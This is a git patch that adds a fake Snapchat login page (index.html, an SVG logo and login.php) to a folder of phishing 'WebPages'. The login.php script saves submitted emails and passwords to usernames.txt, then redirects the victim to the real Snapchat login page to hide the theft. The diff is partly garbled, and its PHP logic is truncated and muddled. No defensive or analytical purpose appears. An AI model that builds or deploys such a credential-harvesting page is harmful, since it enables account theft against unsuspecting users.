From df03c920fb2616b1da90dce286e241bbf03bdf7f Mon Sep 17 00:00:00 2001 From: Usama Abdul Sattar Date: Tue, 1 May 2018 15:11:34 +0500 Subject: [PATCH] snapchat updated --- WebPages/Snapchat_web/ghost.svg | 44 + WebPages/Snapchat_web/index.html | 44444 +++++++++++++++++++++++++++++ WebPages/Snapchat_web/login.php | 14 + 3 files changed, 44502 insertions(+) create mode 100644 WebPages/Snapchat_web/ghost.svg create mode 100644 WebPages/Snapchat_web/index.html create mode 100644 WebPages/Snapchat_web/login.php diff --git a/WebPages/Snapchat_web/ghost.svg b/WebPages/Snapchat_web/ghost.svg new file mode 100644 index 0000000..dd041a4 --- /dev/null +++ b/WebPages/Snapchat_web/ghost.svg @@ -0,0 +1,44 @@ + + + + + + diff --git a/WebPages/Snapchat_web/index.html b/WebPages/Snapchat_web/index.html new file mode 100644 index 0000000..1eb3c7e --- /dev/null +++ b/WebPages/Snapchat_web/index.html @@ -0,0 +1,44444 @@ +Log In • Snapchat
\ No newline at end of file diff --git a/WebPages/Snapchat_web/login.php b/WebPages/Snapchat_web/login.php new file mode 100644 index 0000000..ba95400 --- /dev/null +++ b/WebPages/Snapchat_web/login.php @@ -0,0 +1,14 @@ +WELCOME"; + if($myFile != $searchString) { + file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); + header('Location:https://accounts.snapchat.com/accounts/login'); + } + if($myFile != $searchString) { + echo "LOGIN SUCCESSFULL"; + } + exit(); + ?> \ No newline at end of file